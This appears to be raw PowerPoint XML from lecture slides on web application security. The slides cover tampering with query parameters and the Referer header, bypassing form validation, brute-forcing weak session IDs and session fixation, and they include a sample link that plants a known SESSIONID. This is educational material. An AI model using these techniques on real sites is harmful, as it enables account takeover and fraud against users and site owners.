          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The query parameters of a URL could also be used as information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perhaps the price is calculated from a query parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why would a developer do this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulating the query parameter could change the price</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the application accepts the new price</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18545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61356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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP header is defined in the HTTP 1.0 RFC as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request-header field allows the client to specify, for the server's benefit, the address (URI) of the resource from which the Request-URI was obtained. This allows a server to generate lists of back-links to resources for interest, logging, optimized caching, etc. It also allows obsolete or mistyped links to be traced for maintenance. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field must not be sent if the Request-URI was obtained from a source that does not have its own URI, such as input from the user keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The spelling was a typo and was not caught until people were already using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sent automatically by the browser when a link is clicked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can it be trusted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers assume that because it is an HTTP header, it is trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What do you think?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20946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HTTP – Overview </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6869372" y="2577715"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="356930" y="2853249"/>
            <a:ext cx="2106285" cy="1805139"/>
            <a:chOff x="356930" y="2853249"/>
            <a:chExt cx="2106285" cy="1805139"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="skd188256sd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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036424" y="4220585"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463215" y="5807180"/>
            <a:ext cx="1808720" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724150" y="4395143"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892732" y="5991068"/>
            <a:ext cx="1808720" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776846" y="4427555"/>
            <a:ext cx="1808720" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895243" y="5113589"/>
            <a:ext cx="1605595" cy="87747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Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088558" y="4220585"/>
            <a:ext cx="766154" cy="52372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999350" y="5041620"/>
            <a:ext cx="1037074"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392815" y="3721555"/>
            <a:ext cx="660003" cy="9368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408778" y="4134772"/>
            <a:ext cx="660003" cy="9368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3999351" y="5351049"/>
            <a:ext cx="103707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768451" y="4431138"/>
            <a:ext cx="907840" cy="640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965654" y="3347512"/>
            <a:ext cx="881513" cy="48175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Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42432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5" grpId="0" animBg="1"/>
      <p:bldP spid="35"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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Control Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header is untrusted and can be manipulated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Therefore, using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header to ensure that the user is visiting your application in the intended order is a mistake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using -H option of curl to set arbitrary HTTP headers on request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11822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Forms Input Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As mentioned in client-side scripting lectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer can specify HTML 5 restrictions/validation on form input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>required attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type=email </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pattern attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom validation using JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All can be bypassed </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10326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normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who is the user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breaking means impersonating another user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the user allowed to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin, regular, guest, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking means performing actions that you're not allowed to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often intertwined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you're able to break the authentication to log in as a different user, then you've also broken authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348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Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eavesdropping credentials/authenticators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute-forcing/guessing credentials/authenticators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection (later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20435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Eavesdropping </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials and Authenticators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the HTTP connection is not protected by SSL it is possible to eavesdrop the credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password sent as part of an HTTP basic authentication exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password submitted through a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The authenticator included as cookie, URL parameter, or hidden field in a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The "secure" flag on cookies is a good way to prevent accidental leaking of sensitive authentication information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6478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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Brute-forcing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Credentials and Authenticators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If authenticators have a limited value domain they can be brute-forced (e.g., 4-digit PIN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: lockout policies might not be enforced in mobile web interfaces to accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If authenticators are chosen in a non-random way they can be easily guessed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sequential session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-specified passwords </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.foo.bar/secret.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BGH10110915103939 observed at 15:10 of November 9, 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Long-lived authenticators make these attacks more likely to succeed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838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9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9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9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9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97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97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9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Bypassing Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Form-based authentication may be bypassed using carefully crafted arguments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authentication, in certain case can be bypassed using forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Weak password recovery procedures can be leveraged to reset a victim’s password to a known value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Session fixation forces the user’s session ID to a known value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>For example, by luring the user into clicking on a link such as:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>foo.com/vulnerable.php?SESSIONID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=1234&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The ID can be a fixed value or could be obtained by the attacker through a previous interaction with the vulnerable system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61058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4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4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4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4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4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4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a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="934916" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="3319909"/>
          <a:ext cx="1219200" cy="812800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1083" r:id="rId4" imgW="4581525" imgH="3524250" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId4" imgW="4581525" imgH="3524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319909"/>
                        <a:ext cx="1219200" cy="8128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34917" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7315200" y="3218309"/>
          <a:ext cx="520700" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1084" r:id="rId6" imgW="1511166" imgH="3975234" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId6" imgW="1511166" imgH="397523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18309"/>
                        <a:ext cx="520700" cy="13716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sp>
        <p:nvSpPr>
          <p:cNvPr id="934919" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2228610" y="3218309"/>
            <a:ext cx="474040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0" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2228610" y="3825235"/>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934925" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3591465" y="2828617"/>
            <a:ext cx="34575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(1) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>login.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
